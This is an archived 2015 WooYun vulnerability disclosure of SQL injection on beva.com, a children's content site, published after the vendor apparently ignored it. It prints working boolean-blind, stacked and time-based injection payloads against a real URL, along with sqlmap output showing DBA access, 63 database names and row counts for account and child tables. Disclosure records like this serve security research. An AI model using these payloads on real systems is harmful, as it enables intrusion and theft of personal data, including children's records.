当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124311

漏洞标题:贝瓦网主站SQL注射342万用户+134婴儿信息泄露DBA权限

相关厂商:贝瓦网

漏洞作者: 路人甲

提交时间:2015-07-03 14:04

修复时间:2015-08-17 14:06

公开时间:2015-08-17 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

www.beva.com/czh/tag/我是注入点

漏洞证明:

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://www.beva.com:80/czh/tag/-5217' OR 2635=2635 AND 'mgnX' LIKE 'mgnX
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://www.beva.com:80/czh/tag/';(SELECT * FROM (SELECT(SLEEP(5)))McEv)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.beva.com:80/czh/tag/' AND (SELECT * FROM (SELECT(SLEEP(5)))hzJZ) AND 'ysRU' LIKE 'ysRU
---
back-end DBMS: MySQL 5.0.11
current user: 'work@172.16.1.%'
current user is DBA: True
available databases [63]:
[*] db_0613
[*] db_account
[*] db_account_cms
[*] db_act_vip61
[*] db_activity
[*] db_ad
[*] db_admin
[*] db_app
[*] db_ask
[*] db_baike
[*] db_bbx
[*] db_cartoon
[*] db_childrensday
[*] db_common
[*] db_cookbook
[*] db_crm
[*] db_czh
[*] db_ebook_cms
[*] db_expert
[*] db_family
[*] db_father
[*] db_feature
[*] db_friendlink
[*] db_growth
[*] db_kb
[*] db_kehu
[*] db_kf_cms
[*] db_ks_cms
[*] db_ks_web
[*] db_moban
[*] db_mobile
[*] db_mobile_app
[*] db_mobile_erge
[*] db_mobiletv_order
[*] db_openplat_app
[*] db_order
[*] db_parents
[*] db_pay
[*] db_photo
[*] db_promotion
[*] db_report
[*] db_repository
[*] db_resource_center
[*] db_show
[*] db_superstar2
[*] db_survey
[*] db_taoqibao
[*] db_tingting
[*] db_tingting2_cms
[*] db_tingting_mobile
[*] db_tqb_cms
[*] db_video
[*] db_video_data
[*] db_vip_activity
[*] db_wechat
[*] db_www
[*] db_wwwseo_web
[*] ecshop
[*] information_schema
[*] mysql
[*] slowlogs
[*] test
[*] xweibo_beva
Database: db_account
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| t_account | 3428274 |
| t_relation | 1475906 |
| t_child | 1341668 |
| t_open_bind | 565538 |
| t_vip_score_detail | 535780 |
| t_vip_score | 428560 |
| t_lenovo_users | 16 |
+--------------------+---------+
Database: db_order
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| t_order_gift | 88430 |
| t_experience_order | 82460 |
| t_order | 51166 |
| t_order_action | 49867 |
| t_order_goods | 30630 |
| t_order_pay | 2744 |
| t_goods_gift_map | 807 |
| t_goods | 393 |
| t_daili | 34 |
+--------------------+---------+

修复方案:

修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论